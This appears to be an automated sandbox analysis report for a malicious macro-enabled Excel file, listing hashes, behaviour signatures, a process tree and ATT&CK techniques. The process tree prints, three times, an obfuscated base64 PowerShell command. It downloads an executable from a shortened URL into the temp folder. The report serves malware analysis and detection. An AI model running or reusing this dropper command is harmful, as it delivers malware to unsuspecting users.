Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    26-03-2021 15:45

General

  • Target

    ORDER COPY-326.xlsm

  • Size

    154KB

  • MD5

    9a30f275af39b20ce59988b3c1724a68

  • SHA1

    d35c17ba0c5f09cb212e0a50d117b91d278ec6b3

  • SHA256

    7fe87c98f71cb7cfad4b7713284b7cfe1a0a5e059d5eb5e2c1b322426a6e52ff

  • SHA512

    7898565b62505be720c625899fd3b9f1fb9338a8653066f2c9bf660a1f59fa16529ce4c8e6c1ee597fc3855992ca1e522dce536790c8268ca75684f79636031d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://cutt.ly/fxD7Hr0

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ORDER COPY-326.xlsm"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1564
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAHUAdAB0AC4AbAB5AC8AZgB4AEQANwBIAHIAMAAnACwAKAAkAGUAbgB2ADoAVABlAG0AcAApACsAJwBcAGUAeABjAGUAbAAuAGUAeABlACcAKQA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:996

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/996-12-0x00000000048C0000-0x00000000048C1000-memory.dmp
    Filesize

    4KB

  • memory/996-31-0x0000000006290000-0x0000000006291000-memory.dmp
    Filesize

    4KB

  • memory/996-10-0x00000000009E0000-0x00000000009E1000-memory.dmp
    Filesize

    4KB

  • memory/996-32-0x00000000062C0000-0x00000000062C1000-memory.dmp
    Filesize

    4KB

  • memory/996-11-0x0000000004900000-0x0000000004901000-memory.dmp
    Filesize

    4KB

  • memory/996-7-0x0000000000000000-mapping.dmp
  • memory/996-8-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
    Filesize

    8KB

  • memory/996-24-0x0000000006160000-0x0000000006161000-memory.dmp
    Filesize

    4KB

  • memory/996-33-0x000000007EF30000-0x000000007EF31000-memory.dmp
    Filesize

    4KB

  • memory/996-23-0x00000000060C0000-0x00000000060C1000-memory.dmp
    Filesize

    4KB

  • memory/996-9-0x000000006C290000-0x000000006C97E000-memory.dmp
    Filesize

    6.9MB

  • memory/996-13-0x00000000048C2000-0x00000000048C3000-memory.dmp
    Filesize

    4KB

  • memory/996-14-0x0000000002550000-0x0000000002551000-memory.dmp
    Filesize

    4KB

  • memory/996-15-0x0000000004850000-0x0000000004851000-memory.dmp
    Filesize

    4KB

  • memory/996-18-0x00000000055F0000-0x00000000055F1000-memory.dmp
    Filesize

    4KB

  • memory/1564-5-0x0000000000000000-mapping.dmp
  • memory/1688-6-0x0000000000000000-mapping.dmp
  • memory/1732-3-0x0000000071611000-0x0000000071613000-memory.dmp
    Filesize

    8KB

  • memory/1732-2-0x000000002F8D1000-0x000000002F8D4000-memory.dmp
    Filesize

    12KB

  • memory/1732-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB